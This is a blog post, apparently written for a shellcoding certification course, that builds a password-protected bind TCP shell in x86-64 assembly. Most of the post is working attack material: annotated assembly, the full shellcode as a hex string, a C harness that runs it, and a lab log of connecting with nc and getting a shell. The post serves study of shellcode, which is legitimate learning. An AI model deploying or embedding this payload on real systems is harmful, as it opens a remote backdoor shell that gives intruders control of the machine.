<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.3.0" /><meta property="og:title" content="SLAE64 - Assignment 1A - Password-Protected Bind TCP Shellcode" /><meta name="author" content="fwinsnes" /><meta property="og:locale" content="en" /><meta name="description" content="Introduction" /><meta property="og:description" content="Introduction" /><link rel="canonical" href="https://whitecr0wz.github.io/posts/SLAE64-Bind-Password/" /><meta property="og:url" content="https://whitecr0wz.github.io/posts/SLAE64-Bind-Password/" /><meta property="og:site_name" content="Knowledge Library" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-01-20T05:44:00+00:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="SLAE64 - Assignment 1A - Password-Protected Bind TCP Shellcode" /><meta name="twitter:site" content="@whitecr0wz" /><meta name="twitter:creator" content="@fwinsnes" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"fwinsnes"},"dateModified":"2021-01-20T05:44:00+00:00","datePublished":"2021-01-20T05:44:00+00:00","description":"Introduction","headline":"SLAE64 - Assignment 1A - Password-Protected Bind TCP Shellcode","mainEntityOfPage":{"@type":"WebPage","@id":"https://whitecr0wz.github.io/posts/SLAE64-Bind-Password/"},"url":"https://whitecr0wz.github.io/posts/SLAE64-Bind-Password/"}</script><title>SLAE64 - Assignment 1A - Password-Protected Bind TCP Shellcode | Knowledge Library</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Knowledge Library"><meta name="application-name" content="Knowledge Library"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto"> <img src="https://whitecr0wz.github.io/assets/img/Felipe-Winsnes.jpeg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Knowledge Library</a></div><div class="site-subtitle font-italic">Just sharing interesting tech stuff :)</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://twitter.com/whitecr0wz" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a></div></div><div id="topbar-wrapper"><div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>SLAE64 - Assignment 1A - Password-Protected Bind TCP Shellcode</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper" class="d-flex justify-content-center"><div id="main" class="container pl-xl-4 pr-xl-4"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4"><div class="post pl-1 pr-1 pl-md-2 pr-md-2"><h1 data-toc-skip>SLAE64 - Assignment 1A - Password-Protected Bind TCP Shellcode</h1><div class="post-meta text-muted"> <span> Posted <em class="" data-ts="1611121440" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Jan 20, 2021 </em> </span><div class="d-flex justify-content-between"> <span> By <em> Felipe Winsnes </em> </span><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1932 words"> <em>10 min</em> read</span></div></div></div><div class="post-content"><h4 id="introduction"><span class="mr-2">Introduction</span><a href="#introduction" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>These series of posts starting with the prefix “SLAE64 - Assignment” will be created in order to fulfill the requirements of the SLAE64 certification. Today we are going to have a close look at Linux Bind Shells with password protection.</p><p>A Bind shell is a form of malware which grants remote access to a system through a shell. However, it differentiates from its peer the Reverse Shell, binding to a local port of the compromised system, instead of arranging a specific connection on a trivial address. Furthermore, after the connection is established, a shell is executed, granting interaction to the attacker</p><p>The first assignment from the seven is divided in two sections:</p><ul><li>A: Requires the creation of a Bind Shell with password protection through the Assembly language, and converting such into shellcode.<li>B: The discussed Bind Shell provided during the course should be modified, in order that it no longer possesses any form of NULL bytes (00).</ul><p>As exercise A is already quite a complex and long exercise, the first assignment will be segmented in two different posts, thing which may repeat within the second assignment. During the length of this post, you will observe the solution for exercise A. Moreover, the main idea of a Bind Shell and process of programming such has already been explored <a href="https://whitecr0wz.github.io/posts/SLAE-Bind/">here</a>. Therefore, I thought of focusing the blog’s topic on the new addition regarding the password protection instead, which is by itself rather complex.</p><h5 id="theory"><span class="mr-2">Theory</span><a href="#theory" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5><p>If you remember the <a href="https://whitecr0wz.github.io/posts/SLAE-Bind/">x86 version of this assignment</a>, you’d remember that the required functions for a Bind Shell are the following:</p><ul><li><p>Socket</p><li><p>Bind</p><li><p>Listen</p><li><p>Accept</p><li><p>Dup2</p><li><p>Execve</p></ul><p>After the dup2 syscall has been satisfied and executed, the connection should already possess the ability to interact with the other gadget. Therefore, we could send a message and receive information from the other device. The process will be the following:</p><ul><li><p>Socket</p><li><p>Bind</p><li><p>Listen</p><li><p>Accept</p><li><p>Dup2</p><li><p>Function that is only executed if the comparison ends up not matching. (write failure message)</p><li><p>Function that asks for the passcode (write). After the dup2 syscall is initialized, a JMP will be set so that the flow directly continues to this function.</p><li><p>Function that reads the input (read).</p><li><p>Function that compares the input with the intended passcode. If they do not match, jump to the failure function.</p><li><p>Execve</p></ul><h5 id="time-to-stick-our-hands-into-the-mud"><span class="mr-2">Time to stick our hands into the mud</span><a href="#time-to-stick-our-hands-into-the-mud" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5><p>Let’s start with the failure function, right after dup2.</p><p>The process should be the following.</p><p>Arguments required for write according to the man page: <code class="language-plaintext highlighter-rouge">ssize_t write(int fd, const void *buf, size_t count);</code></p><ul><li>It is required to call the write syscall. This will be arranged by incrementing the value of AL by 1.<li>RDI will be incremented as well, as this will give RDI the STDOUT value, printing to the screen.<li>RSI will hold temporarely and push the value to print to the screen.<li>RSI will then copy the value from RSP.<li>DL will be given the length of the entire string.<li>This should write “Incorrect credentials. “ into the client’s screen.</ul><pre><code class="language-term">        jmp question           ; Jump to the "question" function.

halt:

        xor rax, rax           ; Zeroes out RAX.
        xor rdi, rdi           ; Zeroes out RDI.
        xor rsi, rsi           ; Zeroes out RSI.
        xor rdx, rdx           ; Zeroes out RDX.

        push rdi               ; Pushes the NULL DWORD (0x00000000) of RDI into the stack.
        pop rbp                ; Pops the NULL DWORD in RBP.
        push rbp               ; Pushes the NULL DWORD (0x00000000) of RBP into the stack. Without this combination of PUSH/POP instructions the printed characters would have an 
                               ; additional character that isn't needed (I.E an - or &lt;)

        inc al                 ; Increments AL, giving the value 1 for the syscall write.
        inc rdi                ; Increments RDI, giving the value of 1, arranging STDOUT, printing the message on the screen.

        add si, ' '            ; Blank space.
        push rsi               ; Pushes the value of RSI into the stack.

        xor rsi, rsi           ; Zeroes out RSI.

        mov rsi, 'entials.'    ; Inserts value 'entials.' into RSI
        push rsi               ; Pushes the value of RSI into the stack.

        xor rsi, rsi           ; Zeroes out RSI.

        add rsi, 'cred'        ; Inserts value 'cred' into RSI
        push rsi               ; Pushes the value of RSI into the stack.

        xor rsi, rsi           ; Zeroes out RSI.

        add si, 't '           ; Inserts value 't ' into SI
        push rsi               ; Pushes the value of RSI into the stack.

        mov rsi, 'Incorrec'    ; Inserts value 'Incorrec' into RSI
        push rsi               ; Pushes the value of RSI into the stack.

        mov rsi, rsp           ; Copies the value of RSP into RSI. The complete phrase should be "Incorrect credentials. "
        mov dl, 34             ; Gives DL the length of the entire string, which should be around 34. If DL is given a bigger value than the real one (I.E 50), the password will 
                               ; be printed when this message pops up.
        syscall                ; The syscall is executed.
</code></pre><p>Great, the failure function has already been set, let us continue with the function “question”.</p><p>The process should be incredibly similar to the failure function, as the main point of both is to write to the screen:</p><p>Arguments required for write according to the man page: <code class="language-plaintext highlighter-rouge">ssize_t write(int fd, const void *buf, size_t count);</code></p><ul><li>It is required to call the write syscall. This will be arranged by incrementing the value of AL by 1.<li>RDI will be incremented as well, as this will give RDI the STDOUT value, printing to the screen.<li>RSI will hold temporarely and push the value to print to the screen.<li>RSI will then copy the value from RSP.<li>DL will be given the length of the entire string.<li>This should write “Introduce your password:” into the client’s screen.</ul><pre><code class="language-term">question:

        xor rax, rax           ; Zeroes out RAX
        xor rdi, rdi           ; Zeroes out RDI
        xor rsi, rsi           ; Zeroes out RSI
        xor rdx, rdx           ; Zeroes out RDX

        push rdi               ; Pushes the NULL DWORD (0x00000000) of RDI into the stack.
        pop rbp                ; Pops the NULL DWORD in RBP.
        push rbp               ; Pushes the NULL DWORD (0x00000000) of RBP into the stack. Without this combination of PUSH/POP instructions the printed characters would have an 
                               ; additional character that isn't needed (I.E an - or &lt;).

        inc al                 ; Increments AL, giving the value 1 for the syscall write.
        inc rdi                ; Increments RDI, giving the value of 1, arranging STDOUT, printing the message on the screen.

        mov rsi, 'assword:'    ; Inserts value 'assword:' into RSI.
        push rsi               ; Pushes the value of RSI into the stack.

        mov rsi, 'e your p'    ; Inserts value 'e your p' into RSI.
        push rsi               ; Pushes the value of RSI into the stack.

        mov rsi, 'Introduc'    ; Inserts value 'Introduc' into RSI.
        push rsi               ; Pushes the value of RSI into the stack.

        mov rsi, rsp           ; Copies the value of RSP into RSI. The complete phrase should be "Introduce your password:"

        mov dl, 28             ; Gives DL the length of the entire string, which should be around 28. If DL is given a bigger value than the real one (I.E 50), the string will 
                               ; be printed several times and lack certain characters.
        syscall                ; The syscall is executed.
</code></pre><p>We can now proceed with the read function, which will obtain the input.</p><p>The process should be the following:</p><p>Arguments required for write according to the man page: <code class="language-plaintext highlighter-rouge">ssize_t read(int fd, void *buf, size_t count);</code></p><ul><li>The value of RAX is set to 0, as it is the value for the read syscall.<li>The value of RDI is quite irrelevant, therefore, it is zeroed as well.<li>RSI is inserted the value of RSP.<li>DL is given the quantity of bytes to read. Nonetheless, as long as the quantity is as big as the input, anything goes!</ul><pre><code class="language-term">read:

        xor rax, rax           ; Zeroes out RAX.
        xor rdi, rdi           ; Zeroes out RDI.
        xor rdx, rdx           ; Zeroes out RDX.

        push rdx               ; Pushes the NULL DWORD (0x00000000) of RDX into the stack.
        pop rbp                ; Pops the NULL DWORD in RBP.
        push rbp               ; Pushes the NULL DWORD (0x00000000) of RBP into the stack. Without this combination of PUSH/POP instructions the printed characters would have an
                               ; additional character that isn't needed (I.E an - or &lt;).

        mov rsi, rsp           ; Copies the value of RSP into RSI.

        mov dl, 30             ; Gives DL the quantity of bytes to read, anything beyond intended should work as well.
        syscall                ; The syscall is executed.
</code></pre><p>Finally, we are left with the comparison, this is where the fun begins. The process should follows a very specific procedure:</p><ul><li>RDI is given the value of RSP. In other words, RDI should hold the value of the input.<li>RSI is used in order to save the password to compare with.<li>RCX will be used as a counter.<li><p>The instructions <code class="language-plaintext highlighter-rouge">repe cmpsb</code>, in simple terms, will compare every byte of RDI with RSI, as long as these match, the Zero flag (ZF) will be set. Furthermore, if all 16 bytes are the same, the ZF will remain deployed.</p><li>If the ZF has not been set after the <code class="language-plaintext highlighter-rouge">repe cmpsb</code> operations, it means that the input was incorrect, therefore, a JNZ jump has been set pointing towards the halt function, giving the failure message and repeating the loop.</ul><pre><code class="language-term">comparison:
                               ; Password: WjbkN3yQRpKVEFbA
        mov rdi, rsp           ; Copies the value of RSP into RSI. This will copy what was read on the previous function.

        xor rax, rax           ; Zeroes out RAX.
        xor rsi, rsi           ; Zeroes out RSI.
        xor rdx, rdx           ; Zeroes out RDX.

        mov rsi, 'RpKVEFbA'    ; Inserts value 'RpKVEFbA' into RSI.
        push rsi               ; Pushes the value of RSI into the stack.

        mov rsi, 'WjbkN3yQ'    ; Inserts value 'WjbkN3yQ' into RSI.
        push rsi               ; Pushes the value of RSI into the stack.

        mov rsi, rsp           ; Copies the value of RSP into RSI.

        xor rcx, rcx           ; Zeroes out RCX
        mov cl, 16             ; Gives CL a value of 16. This value should remain the same length as the password (WjbkN3yQRpKVEFbA), as this value will be crucial for 
                               ; comparison.
                               ; If given less, the complete password isn't needed. If given more, the credential will not work even if sent correctly.

        repe cmpsb             ; Will compare the strings and check if such match. If they do, it sets the Zero flag (ZF).
        jnz halt               ; Jump if the as long as the Zero flag (ZF) is not set, this means that if the password is incorrect, it should redirect the flow to the error 
                               ; message.
</code></pre><h4 id="final-code"><span class="mr-2">Final Code</span><a href="#final-code" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>The full code can be found <a href="https://github.com/whitecr0wz/SLAE/blob/main/SLAE64/Assignment_1/1.asm">here</a></p><h4 id="shellcode"><span class="mr-2">Shellcode</span><a href="#shellcode" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><pre><code class="language-term">whitecr0wz@SLAE64:~/assembly/assignments/Assignment_1$ nasm -f elf64 1.asm -o 1.o &amp;&amp; ld 1.o -o 1 &amp;&amp; for i in $(objdump -d 1 -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; 
done;echo 
\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x66\x6a\x29\x66\x58\x48\xff\xc7\x48\xff\xc7\x48\xff\xc6\x52\x0f\x05\x48\x89\xc3\x66\x6a\x31\x66\x58\x48\x89\xdf\x52\x52\x66\x68\
x23\x28\x66\x6a\x02\x48\x89\xe6\xb2\x1e\x0f\x05\x66\x6a\x32\x66\x58\x48\x89\xdf\x48\x31\xf6\x0f\x05\x66\x6a\x2b\x66\x58\x48\x89\xdf\x48\x31\xf6\x48\x31\xd2\x0f\x05\x48\x89\xc5\x
48\xff\xc6\x48\xff\xc6\x48\xff\xc6\x66\x6a\x21\x66\x58\x48\x89\xef\x48\xff\xce\x0f\x05\x75\xf1\xeb\x4d\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x57\x5d\x55\xfe\xc0\x48\xf
f\xc7\x66\x83\xc6\x20\x56\x48\x31\xf6\x48\xbe\x65\x6e\x74\x69\x61\x6c\x73\x2e\x56\x48\x31\xf6\x48\x81\xc6\x63\x72\x65\x64\x56\x48\x31\xf6\x66\x81\xc6\x74\x20\x56\x48\xbe\x49\x6e
\x63\x6f\x72\x72\x65\x63\x56\x48\x89\xe6\xb2\x22\x0f\x05\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x57\x5d\x55\xfe\xc0\x48\xff\xc7\x48\xbe\x61\x73\x73\x77\x6f\x72\x64\x3a\
x56\x48\xbe\x65\x20\x79\x6f\x75\x72\x20\x70\x56\x48\xbe\x49\x6e\x74\x72\x6f\x64\x75\x63\x56\x48\x89\xe6\xb2\x1c\x0f\x05\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x52\x5d\x55\x48\x89\x
e6\xb2\x1e\x0f\x05\x48\x89\xe7\x48\x31\xc0\x48\x31\xf6\x48\x31\xd2\x48\xbe\x52\x70\x4b\x56\x45\x46\x62\x41\x56\x48\xbe\x57\x6a\x62\x6b\x4e\x33\x79\x51\x56\x48\x89\xe6\x48\x31\xc
9\xb1\x10\xf3\xa6\x0f\x85\x32\xff\xff\xff\x48\x31\xc0\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x66\x6a\x3b\x66\x58\x0f\x05
whitecr0wz@SLAE64:~/assembly/assignments/Assignment_1$
</code></pre><p>Let’s execute this within the C format:</p><pre><code class="language-term">#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x66\x6a\x29\x66\x58\x48\xff\xc7\x48\xff\xc7\x48\xff\xc6\x52\x0f\x05\x48\x89\xc3\x66\x6a\x31\x66\x58\x48\x89\xdf\x52\x52\x66\x68
\x23\x28\x66\x6a\x02\x48\x89\xe6\xb2\x1e\x0f\x05\x66\x6a\x32\x66\x58\x48\x89\xdf\x48\x31\xf6\x0f\x05\x66\x6a\x2b\x66\x58\x48\x89\xdf\x48\x31\xf6\x48\x31\xd2\x0f\x05\x48\x89\xc5\
x48\xff\xc6\x48\xff\xc6\x48\xff\xc6\x66\x6a\x21\x66\x58\x48\x89\xef\x48\xff\xce\x0f\x05\x75\xf1\xeb\x4d\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x57\x5d\x55\xfe\xc0\x48\x
ff\xc7\x66\x83\xc6\x20\x56\x48\x31\xf6\x48\xbe\x65\x6e\x74\x69\x61\x6c\x73\x2e\x56\x48\x31\xf6\x48\x81\xc6\x63\x72\x65\x64\x56\x48\x31\xf6\x66\x81\xc6\x74\x20\x56\x48\xbe\x49\x6
e\x63\x6f\x72\x72\x65\x63\x56\x48\x89\xe6\xb2\x22\x0f\x05\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x57\x5d\x55\xfe\xc0\x48\xff\xc7\x48\xbe\x61\x73\x73\x77\x6f\x72\x64\x3a
\x56\x48\xbe\x65\x20\x79\x6f\x75\x72\x20\x70\x56\x48\xbe\x49\x6e\x74\x72\x6f\x64\x75\x63\x56\x48\x89\xe6\xb2\x1c\x0f\x05\x48\x31\xc0\x48\x31\xd2\x52\x5d\x55\x48\x89\xe6\xb2\x1e\
x0f\x05\x48\x89\xe7\x48\x31\xc0\x48\x31\xf6\x48\x31\xd2\x48\xbe\x52\x70\x4b\x56\x45\x46\x62\x41\x56\x48\xbe\x57\x6a\x62\x6b\x4e\x33\x79\x51\x56\x48\x89\xe6\x48\x31\xc9\xb1\x10\x
f3\xa6\x0f\x85\x35\xff\xff\xff\x48\x31\xc0\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x66\x6a\x3b\x66\x58\x0f\x05"

;

main()
{

  printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}
</code></pre><h4 id="endgame"><span class="mr-2">EndGame</span><a href="#endgame" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><pre><code class="language-term">whitecr0wz@SLAE64:~/assembly/assignments/Assignment_1$ gcc bind_password.c -o bind_password -fno-stack-protector -z execstack -w 
whitecr0wz@SLAE64:~/assembly/assignments/Assignment_1$ ./bind_password 
Shellcode Length:  353

─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
root@whitecr0wz:~# rlwrap nc 192.168.100.205 9000 -v 
192.168.100.205: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.100.205] 9000 (?) open
Introduce your password:password
Incorrect credentials. Introduce your password:WjbkN3yQRpKVEFbAF
python3 -c 'import pty;pty.spawn("/bin/bash")'
whitecr0wz@SLAE64:/home/whitecr0wz/assembly/assignments/Assignment_1$ id 
id 
uid=1000(whitecr0wz) gid=1000(whitecr0wz) groups=1000(whitecr0wz),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
whitecr0wz@SLAE64:/home/whitecr0wz/assembly/assignments/Assignment_1$
</code></pre><h3 id="code"><span class="mr-2">Code</span><a href="#code" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: <a href="http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/">http://securitytube-training.com/online- courses/securitytube-linux-assembly-expert/</a></p><p>Student ID: SLAE64–27812/PA-27812</p><p>You can find all of the used resources within this post <a href="https://github.com/whitecr0wz/SLAE/tree/main/SLAE64/Assignment_1/">here</a>.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/slae64/'>SLAE64</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/assembly/" class="post-tag no-text-decoration" >assembly</a> <a href="/tags/shellcoding/" class="post-tag no-text-decoration" >shellcoding</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"></div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=SLAE64+-+Assignment+1A+-+Password-Protected+Bind+TCP+Shellcode+-+Knowledge+Library&url=https%3A%2F%2Fwhitecr0wz.github.io%2Fposts%2FSLAE64-Bind-Password%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=SLAE64+-+Assignment+1A+-+Password-Protected+Bind+TCP+Shellcode+-+Knowledge+Library&u=https%3A%2F%2Fwhitecr0wz.github.io%2Fposts%2FSLAE64-Bind-Password%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Fwhitecr0wz.github.io%2Fposts%2FSLAE64-Bind-Password%2F&text=SLAE64+-+Assignment+1A+-+Password-Protected+Bind+TCP+Shellcode+-+Knowledge+Library" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/VyOS-OSPF-I/">VyOS - OSPF Basic Network</a><li><a href="/posts/Alignments-on-windows-registers/">Alignments on Windows Registers</a><li><a href="/posts/Vulnserver-LTER/">Vulnserver LTER - SEH Extremely restricted character set</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/shellcoding/">shellcoding</a> <a class="post-tag" href="/tags/assembly/">assembly</a> <a class="post-tag" href="/tags/vulnerability/">vulnerability</a> <a class="post-tag" href="/tags/networking/">Networking</a> <a class="post-tag" href="/tags/vyos/">VyOS</a> <a class="post-tag" href="/tags/ospf/">OSPF</a> <a class="post-tag" href="/tags/routing/">Routing</a> <a class="post-tag" href="/tags/soho/">SOHO</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Alignments-on-windows-registers/"><div class="card-body"> <em class="small" data-ts="1612158240" data-df="ll" > Feb 1, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Alignments on Windows Registers</h3><div class="text-muted small"><p> Preamble Welcome once again to my website! Within this post, i will be introducing methods to align x86 registers on Windows, topic that was hard for me to find when starting regarding Binary Expl...</p></div></div></a></div><div class="card"> <a href="/posts/Vulnserver-LTER/"><div class="card-body"> <em class="small" data-ts="1612244640" data-df="ll" > Feb 2, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Vulnserver LTER - SEH Extremely restricted character set</h3><div class="text-muted small"><p> Introduction Last time i blogged, we tackled aligning registers within windows exploit development. Today we will be seeing an example on the vulnerable server by stephen bradshaw, in which, a res...</p></div></div></a></div><div class="card"> <a href="/posts/Backdooring-PE/"><div class="card-body"> <em class="small" data-ts="1603172640" data-df="ll" > Oct 20, 2020 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Backdooring PE Files through Code Caves</h3><div class="text-muted small"><p> Introduction Building malware is a topic which has always been from great interest to me. However, injecting malicious code within benign software seems a very concerning yet engrossing concept. ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/SLAE-Custom-Crypter/" class="btn btn-outline-primary" prompt="Older"><p>SLAE - Assignment 7 - Custom Crypter</p></a> <a href="/posts/SLAE64-Null-Free-Bind/" class="btn btn-outline-primary" prompt="Newer"><p>SLAE64 - Assignment 1B - Null-Free Bind TCP Shellcode</p></a></div></div></div><footer class="row pl-3 pr-3"><div class="col-12 d-flex justify-content-between align-items-center text-muted pl-0 pr-0"><div class="footer-left"><p class="mb-0"> © 2023 <a href="https://twitter.com/whitecr0wz">Felipe Winsnes</a>.</p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/shellcoding/">shellcoding</a> <a class="post-tag" href="/tags/assembly/">assembly</a> <a class="post-tag" href="/tags/vulnerability/">vulnerability</a> <a class="post-tag" href="/tags/networking/">Networking</a> <a class="post-tag" href="/tags/vyos/">VyOS</a> <a class="post-tag" href="/tags/ospf/">OSPF</a> <a class="post-tag" href="/tags/routing/">Routing</a> <a class="post-tag" href="/tags/soho/">SOHO</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a><div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-animation="true" data-autohide="false"><div class="toast-header"> <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close"> <span aria-hidden="true">&times;</span> </button></div><div class="toast-body text-center pt-0"><p class="pl-2 pr-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></div><script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 